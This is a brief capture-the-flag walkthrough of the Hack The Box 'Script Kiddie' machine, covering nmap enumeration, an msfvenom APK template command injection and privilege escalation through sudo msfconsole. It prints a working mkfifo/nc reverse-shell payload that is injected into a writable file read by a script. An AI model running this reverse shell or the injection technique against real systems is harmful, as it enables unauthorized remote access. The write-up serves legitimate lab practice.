Script Kiddie (Easy)

Script Kiddie Hackthebox Walkthrough

Enumeration

Nmap

nmap -sC -sV -oA nmap/ScriptKiddie 10.10.10.226

# Nmap 7.91 scan initiated Wed May 19 10:36:41 2021 as: nmap -sC -sV -oA nmap/ScriptKiddie 10.10.10.226
Nmap scan report for 10.10.10.226
Host is up (0.36s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 19 10:37:45 2021 -- 1 IP address (1 host up) scanned in 64.18 seconds

We can see this time port 5000 is open and is TCP. Let's navigate it through our browser.

After poking around, we found out from exploit-db where the exploit is msfvenom APK template command injection.

After changing the exploit, and uploaded it, we will get a reverse shell

We found a script laying at pwn user home directory which is scanloser.sh

We can see here the script takes the contents of the hackers file and execute it.

Indeed, the hacker file is writable.

Soon enough, we understand that the cut -d' ' -f3- means it will cut off the first 2 and take the 3rd words depend on the delimiters supply to the command.

We can craft a payload like this and write it to hacker file

echo "a a ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.4 4445 >/tmp/f;" >> hackers

Before that call a reverse shell listener

Escalated our privilege to user pwn

Privilege Escalation

sudo -l then we got this

type sudo msfconsole and type /bin/bash

walla root.